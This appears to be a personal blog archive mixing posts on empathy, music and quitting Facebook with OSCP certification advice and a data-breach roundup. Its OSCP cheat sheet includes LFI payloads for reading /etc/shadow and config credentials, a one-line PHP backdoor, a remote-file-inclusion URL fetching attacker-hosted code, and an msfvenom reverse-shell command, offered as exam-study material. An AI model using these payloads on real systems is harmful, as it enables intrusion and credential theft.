Tag: General

Posted on

Welcome To My World

This phrase is the slogan of a narcissist.

“Welcome to my world.”

It diminishes whatever the person receiving it just said. It turns attention back to the person who said it. It indicates a lack of empathy, and is also a request for sympathy.

“You should feel sorry for me instead.”

Sometimes it is meant to be funny, but underneath the surface it is cruel.

It is entirely possible that not everyone who says it is a narcissist, and people may not even realize it comes off as mean, but it is a red flag, and is a self-centered phrase in any given situation.

Empathy is a good alternative

Instead of saying “Welcome to my world” when someone expresses their struggles with something, you might be tempted to turn to a different phrase such as “I know how that goes” or “I’ve been through that myself.”

These really aren’t much different than “welcome to my world,” just less bratty.

How about trying not to use an “I” statement at all? Don’t turn it back to you. Try some empathy.

“That sounds really difficult.”

“Oh wow, you had a rough day. Let me make you some tea.”

“Tell me more about that.”

Often, what people need, whether they realize it consciously or not, is just to be heard. That can make the difference in turning someone’s bad day around.

In other words, you may not be a narcissist, but using narcissistic phrases can inadvertently shut down and dismiss the person who is trying to convey their plight to you. Offer some support, some kindness, some empathy.

You might be surprised at the reactions you get.

Posted on

New Music

I have been cranking away at some new songs. I just released two over the last week. I hope you enjoy them. Please comment, subscribe, yada yada.

For the Sake of Everything

Rahu, Rahu

And, of course, you can hear the full album I released back in June:

If you’d like a copy of that album on CD, just shoot me your name and address. It is free, and I will cover the shipping cost!

Posted on

Thoughts on OSCP being ‘outdated’

In recent weeks I have been reading comments online about the Penetration Testing with Kali Linux (PWK) course and OSCP exam taking a lot of flak for being “tool old” and using “outdated exploits that don’t even work anymore.”

I believe most of these comments are directed at the lab environment and course materials. It is true that you won’t find many systems in modern pentesting engagements that are exploitable with older things such as EternalBlue (MS17-010).

But that is beside the point.

The PWK and OSCP exam are all about teaching you how to think, solve problems, persevere, and develop a pentesting methodology that works for you.

It is true that Hack The Box (HTB) and other modern online capture-the-flag frameworks are more leading-edge in that regard, which is great, and they can certainly be an excellent way to augment and prepare for the PWK/OSCP journey.

But the point is that it really doesn’t matter if you drive a 2019 Ferrari 488 Spider or a 1996 Honda Accord, it is whether or not you figure out how to get to the destination.

Posted on

The Unofficial OSCP FAQ

It has been close to a year since I took the Penetration Testing with Kali (PWK) course and subsequently obtained the Offensive Security Certified Professional (OSCP) certification. Since then, I have been hanging out in a lot of Slack, Discord, and MatterMost chat rooms for security professionals and enthusiasts (not to mention various subreddits). When discussing the topic of obtaining the OSCP certfication, I have noticed *a lot* of prospective PWK/OSCP students asking the same questions, over and over.

The OffSec website itself covers some of the answers to some of these questions, but whether its because people don’t read it, or that it wasn’t made very clear, these questions keep coming back. Here, I will attempt to answer them as best I can.

Disclaimer: I am not an OffSec employee, nor do I make the claim that anything that follows is OffSec’s official opinion about the matter. These are my opinions; use them at your own risk.

  1. Do I have enough experience to attempt this?
  2. How much lab time should I buy?
  3. Can I use tool X on the exam?
  4. What note keeping app should I use?
  5. How do I format my reports?
  6. Is the HackTheBox.eu lab similar to the OSCP/PWK lab?
  7. Are VulnHub VM’s similar to the OSCP/PWK lab?
  8. What other resources can I use to help me prepare for the PWK course?

According to the official OffSec FAQ you do need some foundational skills before you attempt this course. You should certainly know your way around the Linux command line before diving in, and having a little bash or python scripting under your belt is recommended. That said, it’s more important that you can read code and understand what it is doing than being able to sit down and write something from scratch.

I see many people asking about work experience, which isn’t really covered by OffSec. For example, people wondering if 3 years of networking and/or 1 year being a SOC analyst is “enough.” These questions are impossible to quantify and just as impossible to answer. What you should focus on is your skills as they relate to what is needed for the course.

To do that, head over to the PWK Syllabus page and go through each section. Take notes about things that you are not sure about, or know that you lack skills and expertise in.

Once you have a list made, start your research and find ways to learn about what you need to get up to speed on. For example, when I was preparing for PWK, I knew very little about buffer overflows. I spent a while watching various YouTube videos, reading up on the methods by which you can use a buffer overflow exploit, and taking notes for future reference. Once I started the course, I was able to dive into the exercises and understand what was going on, at least a little bit beyond the very basics, which helped me save time.

In the same boat? Check out this excellent blog post about buffer overflows for something similar to what you will see in the PWK course. Also, while I haven’t tried it yet, I hear that this is a good buffer overflow challenge you can practice on.

Buy the 90 day course in order to get the most out of the experience and not feel crunched for time — especially if you work full time and/or have a family.

With 90 days, you can complete the exercises in the PWK courseware first, and still have plenty of time left for compromising lab machines.

I see this question a lot, perhaps more than any other. People want to know if it is safe to use a specific tool on the exam, such as Sn1per. The official exam guide from OffSec enumerates the types of tools that are restricted on the exam. It is pretty clear that you cannot use commercial tools or automated exploit tools. Keep this statement in mind when wondering if you can use a certain tool:

The primary objective of the OSCP exam is to evaluate your skills in identifying and exploiting vulnerabilities, not in automating the process.

If a tools helps you enumerate a system (nmap, nikto, dirbuster, e.g.), then it is OK to use.

If a tool automates the attacking and exploiting (sqlmap, Sn1per, *autopwn tools), then stay away from it.

Don’t forget the restrictions on Metasploit, too.

From what I have heard, even though OffSec states that they will not discuss anything about it further, people have successfully messaged the admins to ask about a certain tool and gotten replies. Try that if you are still unsure.

I wrote a lot about this already, so be sure to check out that write-up. In short, these are the main takeaways:

  • Do not use KeepNote (which is actually recommended in the PWK course), because it is no longer updated or maintained. People have lost their work because it has crashed on them.
  • CherryTree is an excellent replacement for KeepNote and is easily installed on the OffSec PWK Kali VM (it is bundled by default on the latest/greatest version of Kali).
  • OneNote covers all the bases you might need, is available via the web on your Kali box, and has clients for Mac and Windows.
  • Other options boil down to personal choice: Evernote, markdown, etc.

Check out the example reports that OffSec provides. From those, you can document your PWK exercises, your 10 lab machines (both of which contribute towards the 5 bonus points on the exam), and your exam notes.

I do not recommend skipping the exercise and 10 lab machine documentation, thus forfeiting your 5 extra exam points. I am a living example of someone who would not have passed the exam had I not provided that documentation. Yes, it is time consuming, but it prepares you for the exam documentation and helps you solidify what you have learned in the course.

There are definitely some worthy machine on Hack The Box (HTB) that can help you prepare for OSCP. The enumeration skills alone will help you work on the OSCP labs as you develop a methodology.

There are definitely some more “puzzle-ish” machines in HTB, similar to what you might find in a Capture The Flag event, but there are also plenty of OSCP-like boxes to be found. It is a good way to practice and prepare.

See the above answer about Hack The Box, as much of it applies to the VulnHub machines too. I used VulnHub to help me pre-study for OSCP, and it was a big help. The famous post by Abatchy about OSCP-like VulnHub VM’s is a great resource. My favorites were:

  • All the Kioptrix machines
  • SickOS
  • FrisitLeaks
  • Stapler

There are a lot of resources that can help you pre-study before you dive into the course. I will post some here.

Books

Online Guides

Posted on

Social Media Mayhem

I no longer do Facebook. In light of recent Facebook events (#facebookgate) related to data harvesting and various inaction in being complicit with election manipulation, I have deleted my account enirely.

I you want to keep up with me, and I hope you do, you can follow me here on my website or via Twitter at @willc.

Some day, some other social media platform may creep up into being something worthwhile (remember Ello?), but until then, this will have to do.

Regards,
Your pal,

Will

Posted on

OSCP and PWK Tips, Resources & Tools

Here are some resources and tools I found useful while taking (and passing!) the Pentesting with Kali (PWK) course in preparation for the Offensive Security Certified Professional exam. It has been about two weeks since I passed, and I am still reveling in the satisfaction that has come with it, as it was ultimately a year-long effort to prepare for and take the course in order to pass the exam.

Many people post the usual resources that you can find on various blogs related to the course (g0tmi1k, highoncoffee, pentestmonkey, etc), and those are absolutely useful, but what I have assembled here are less common, and are hopefully useful for those of you about to embark on, or already in, the OSCP journey. They were useful for me.

Enjoy!

How to Pass the OSCP

How to pass the OSCP

  1. Recon
  2. Find vuln
  3. Exploit
  4. Document it

Recon

Unicornscans in cli, nmap in msfconsole to help store loot in database.

TCP

unicornscan -i tap0 -I -mT $IP:adb_nmap -e tap0 -n -v -Pn -sV -sC --version-light -A -p

UDP

unicornscan -i tap0 -I -mU $IP:adb_nmap -e tap0 -n -v -Pn -sV -sC --version-light -A -sU -p

Enumerating

This is the essential part of penetration. Find out what is available and how you could punch through it with minimum ease.

DO NOT SKIP STEPS.

DO NOT PASS GO.

SEARCH ALL THE VERSIONS WITH searchsploit(or google -> site:exploit-db.com APP VERSION)

HTTP – 80, 8080, 8000

curl -i ${IP}/robots.txt

Note down Server and other module versions.

searchsploit them ALL.

Visit all URLs from robots.txt.

nikto -host $IP
gobuster -u http://$IP -w /usr/share/seclists/Discovery/Web_Content/Top1000-RobotsDisallowed.txtgobuster -u http://$IP -w /usr/share/seclists/Discovery/Web_Content/common.txt

if nothing, find more web word lists.

Browse the site but keep an eye on the burp window / source code / cookies etc.

Things to be on look for:

  • Default credentials for software
  • SQL-injectable GET/POST params
  • LFI/RFI through ?page=foo type params
  • LFI:
    • /etc/passwd | /etc/shadow insta-win
    • /var/www/html/config.php or similar paths to get SQL etc creds
    • ?page=php://filter/convert.base64-encode/resource=../config.php
    • ../../../../../boot.ini to find out windows version
  • RFI:
    • Have your PHP/cgi downloader ready
    • <?php include $_GET['inc']; ?> simplest backdoor to keep it dynamic without anything messing your output
    • Then you can just http://$IP/inc.php?inc=http://$YOURIP/bg.php and have full control with minimal footprint on target machine
    • get phpinfo()

HTTPS – 443

Heartbleed / CRIME / Other similar attacks

Read the actual SSL CERT to:

  • find out potential correct vhost to GET
  • is the clock skewed
  • any names that could be usernames for bruteforce/guessing.

FTP – 21

  • Anonymous login
  • Enumerate the hell out of the machine!
    • OS version
    • Other software you can find on the machine (Prog Files, yum.log, /bin)
    • password files
    • DLLs for msfpescan / BOF targets
  • Do you have UPLOAD potential?
    • Can you trigger execution of uploads?
    • Swap binaries?
  • Vulnerabilities in version / RCE / #WINNING?-D

SMB – 139, 445

enum4linux -a $IP

Read through the report and search for versions of things => searchsploit

smbclient -L $IP

Mount shares

mount -t cifs -o user=USERNAME,sec=ntlm,dir_mode=0077 "//10.10.10.10/My Share" /mnt/cifs

Can you access shares?

  • Directly exploitable MSxx-xxx versions?
    • Worth burning MSF strike?

SNMP – UDP 161

  • Try to enumerate windows shares / network info

Quick test of communities:

onesixtyone

Full discovery of everything you can:

snmp-check

TFTP – UDP 69

  • Read / Write access?
    • Pretty much same things as FTP

SSH – 22

Unless you get a MOTD or a broken sshd version, you are SOOL and this is likely just a secondary access point once you break something else.

Email – 25, 110/995 or 143/993

SMTP, POP3(s) and IMAP(s) are good for enumerating users.

Also: CHECK VERSIONS and searchsploit

Buffer Overflow

  1. Determine length of overflow trigger w/ binary search “A”x1000
  2. Determine exact EIP with pattern_create.rb & pattern_offset.rb
  3. Determine badchars to make sure all of your payload is getting through
  4. Develop exploit
  • Is the payload right at ESP
    • JMP ESP
  • Is the payload before ESP
    • sub ESP, 200 and then JMP ESP
    • or
    • call [ESP-200]
  1. msfvenom -a x86 --platform windows/linux -p something/shell/reverse_tcp lhost=x.x.x.x lport=53 -f exe/elf/python/perl/php -o filename
  • Make sure it fits your payload length above
  1. Gain shell, local priv esc or rooted already?

Misc tools

  • cewl for crawling a site for bruteforcing user/password
  • don’t forget about nmap scripts!
    • e.g. --script smtp-commands or --script auth-owners

view raw how-to-oscp-final.md hosted with ❤ by GitHub

My favorite part is this, right at the beginning:

1. Recon
2. Find vuln
3. Exploit
4. Document it

However, I would add a step so that it looks more like this:

1. Recon
2. Find vulnerability
3. Exploit
4. Privilege Escalation
5. Document it

Most of the machines in the PWK labs require that additional step. You seldom run across a VM where you run an exploit and get root right away, with no intermediary privilege escalation step needed. In fact, it is an entirely unique skill that you need to develop, practice, and practice again. What’s more, you have to learn “privesc” for both Linux/Unix and Windows machines — two entirely different methodologies.

Path to OSCP

https://localhost.exposed/path-to-oscp/
An interesting ‘trials and tribulations’ story of one man’s path to accomplishing his goal: the OSCP certification. Contains both video logs and various notes and snippets that may be helpful to you.

One Two Punch

https://github.com/superkojiman/onetwopunch
I didn’t discover this script until I had already rooted about 15 of the machines in the PWK labs, but I wish I had learned of it sooner. It runs a unicornscan (UDP) to find open ports, then passes them to nmap for service detection. It also looks at all 65,535 ports, so you don’t miss anything. Set this up as one of the first things you do when you start working on a new machine (it takes a while to run), then come back to check the results after you’ve done some manual exploration.

Reconnoitre

https://github.com/codingo/Reconnoitre
“A reconnaissance tool made for the OSCP labs to automate information gathering and service enumeration whilst creating a directory structure to store results, findings and exploits used for each host, recommended commands to execute and directory structures for storing loot and flags.”

This tool, named CES tools, ended up being a workhorse, both in the labs and in the exam. Being able to check quick nmap results while more in-depth scans were still going was invaluable for getting things rolling along.

General Tips from Techexams

http://www.techexams.net/forums/security-certifications/116262-oscp-starting-13-12-2015-a-6.html#post1028560
This post has a lot of good tips for the OSCP exam. I can’t stress enough the need to be prepared for the exam, having all the things you need at your fingertips so that you don’t have to go digging through notes of files when you are tight on time or limited on brain power because you’ve been working on this for 18 straight hours.

Test Taking Strategy
http://www.hackingtutorials.org/hacking-courses/offensive-security-certified-professional-oscp/

  • The most useful parts of that site for me were:
    Finish your lab report for 5 extra points and optionally the course exercises for an additional 5 points. You might need them to reach the 70 points.
  • You need to write a penetration test report after the exam. Make sure you know how to write it so you know what information to collect during the exam. The lab report is a great practice for this, use it to learn how to document properly.

There were so many people in the NetSec Focus OSCP Slack channel that skipped the exercises, skipped the videos, and skipped documenting the requisite 10 VMs to get the bonus points for the exam. I saw more than a few of them fail the exam as a result. I would likely have failed the exam had I not completed the exercise and 10 lab machine documentation. All I will say is this:

Do not skip the exercise or lab documentation. These are free points. The way the exam scores total up, you may well need these points to pass!

Timing of the Exam

Also from this page, I chose to follow this exact strategy for timing, and it really worked for me. The important thing to consider is being able to have two fresh starts.

“The second attempt I’ve started the exam at 3 PM and planned to work till 3 AM and then sleep till early morning. This way I had 2 ‘fresh’ starts for the exam to utilize more productive hours.”

I ended up sleeping from 2am to 5am, at which point I set an alarm and a full pot of coffee to carry me through until the exam was over. I also had the support of my amazing wife, who kept me fed and hydrated the whole time.

The Offsec PWK Kali VM

Use the provided Kali VM, do not use the latest/greatest Kali version. Offset provides you with a VM that has been customized to contain everything you need to complete the course and the exam. There is no need to update it. There is no need to run the latest version of Kali. In fact, they customize it in certain ways to make sure you don’t run into problems, so don’t try to use something different. I witnessed multiple people having problems with this in the NetSec Focus OSCP Slack channel, and I wisely used the Offset Kali VM the whole course to avoid issues.

The NetSec Focus Slack Channel

I have mentioned it a few times, but this Slack channel was invaluable during my OSCP journey.  It allowed me to ask questions, bounce ideas off others, and chat with folks who were currently in the course or had already passed it. If you are in the OSCP course and you join the group, ask a moderator to add you to that private OSCP channel once you join. Keep in mind that they do not allow spoilers, or even questions about specific lab machines.  This resource is a great asset for those taking the PWK/OSCP course, and I made some good friends from being there and suffering through it all.

Lastly, I have to say it:

Try harder!

Posted on

Biggest Online Security Breaches in 2017 So Far

Worryingly, we hear about data breaches so much nowadays that we have gotten used to them. From the infamous Ashley Madison breach, where thousands of cheating partners were exposed to the TalkTalk breach, which led to youngsters being arrested, the scandals seem to get worse and worse, as cyber criminals become more sophisticated. In this post, we are going to take a look at some of the biggest data breaches to occur so far in 2017.

Debenhams Flowers – Let’s begin with a data breach that his hit the news very recently. 26,000 customers had their personal data compromised as a consequence of a cyber attack on Debenhams Flowers website. Names, addresses and payment details were taken during the incident, which targeted a third party e-commerce company, Ecomnova. At present, the Debenhams Flowers website is currently offline, as they discover more about the attack, which is believed to have taken place between February and April of this year.

Gmail – Most people reading this post will have a Gmail account, and so the phishing scam that occurred in March was a pretty big deal to say the least. Gmail users were targeted in a sophisticated scam, which saw them receive an email that appeared to come from one of the user’s trusted contacts, such as a friend or a work colleague. The email had a Google Doc attached to it, and encouraged the user to open it. However, once clicked, the link actually lead to a security page, whereby the hacker would gain control of the user’s email account. Despite the fact that Google reacted quickly and was able to stop the attack within an hour, one million users were impacted.

InterContinental Hotels Group – While email platforms and ecommerce websites only have online threats to deal with, the hospitality industry has both physical and cyber security to bear in mind. If you would like some information on the former, take a look at information provided by HS Tech Group.  The InterContinental Hotels Group (IHG) breach is important because it occurred due to malware, which is running rife at the moment. In the beginning, IHG believed that 12 of its properties were impacted by the breach, which saw malware on the servers used to process payments made at on-site bars and restaurants. This meant that stolen data included internal verification codes, card numbers, expiration dates, and card numbers. However, IHG later revealed that 1,200 of their properties had been impacted by the malware attack.

E-Sports Entertainment Association (ESEA) – Last but not least, we have a breach that was announced at the very start of 2017. ESEA, which is one of the biggest video gaming communities in the world, issued a warning to all players after discovering a security incident. It was later revealed that more than 1,500,000 ESEA records were impacted by the breach, and a lot of private data was compromised in the process, including website URLs, phone numbers, birthdates, email addresses, first and last names, usernames, registration date, last login, and much more.

For more information on how you can stay safe while using the Internet, take a look at this blog post.

Posted on

Decluttering

declutter photoWith the start of a new year about to happen, I’ve been doing a lot of reflection on where I’ve been focusing my attention, and what I’ve been getting out of those things. My conclusions led me to discover that I have been putting a lot of time and energy into things that don’t necessarily help me, my family, and everything surrounding those primary things (career, creativity, cashflow, etc).

So, I have decided to give up the following:

  • Caring about sports. I may watch some bigger Louisville basketball games, but overall, this has become more of a chore than anything, and I spend way too much time wrapped up in the emotions surrounding games. This is particularly unproductive when they lose.
  • Facebook. I’ve given it up before, but it serves absolutely no purpose for me. If people want to keep in touch, they know how to find me.
  • Clash of Clans. I’ve led a very successful clan for almost 2 years, and been a part of the game for almost 3. I helped start the Reddit Alliance Clans system, and all of this has been a large time sink. I did have a lot of fun, and I met a lot of great people along the way, but ultimately, it’s been entirely unproductive towards helping any of the primary things in life I mentioned above.
  • Reddit. One thing I’ve noticed is that by deleting apps off my phone, I waste a lot less time. So I am removing the Reddit app that I use, and will instead only check in on occasion when at my computer, at home. I tend to get wrapped up in drawn-out conversations (or arguments) on Reddit far too often. While some of these interactions can have positive outcomes (discussing network security, for example), most of the time I am arguing with people who will never change their minds. Why? I have no idea.

I hope to start using all the freed up time and energy (in no particular order) towards continuing my newfound interest in working out, continuing to educate myself, investing more time and energy with my family, making more music, and focusing on the things that support all of the above — the primary things in life.

I will report back more in a few months to let you know how it all goes!

Photo by ollesvensson

Posted on

The NSA Hacks System Administrators

This article reveals that the people holding the keys are often the juiciest targets, regardless of their innocence, as they are a means to and end. However, perhaps the most interesting part of the article, Inside the NSA’s Secret Efforts to Hunt and Hack System Administrators, is this:

Once the agency believes it has identified a sys admin’s personal accounts, according to the posts, it can target them with its so-called QUANTUM hacking techniques. The Snowden files reveal that the QUANTUM methods have been used to secretly inject surveillance malware into a Facebook page by sending malicious NSA data packets that appear to originate from a genuine Facebook server. This method tricks a target’s computer into accepting the malicious packets, allowing the NSA to infect the targeted computer with a malware “implant” and gain unfettered access to the data stored on its hard drive.

Looks like I chose a good week to cancel my Facebook account 😉

clicky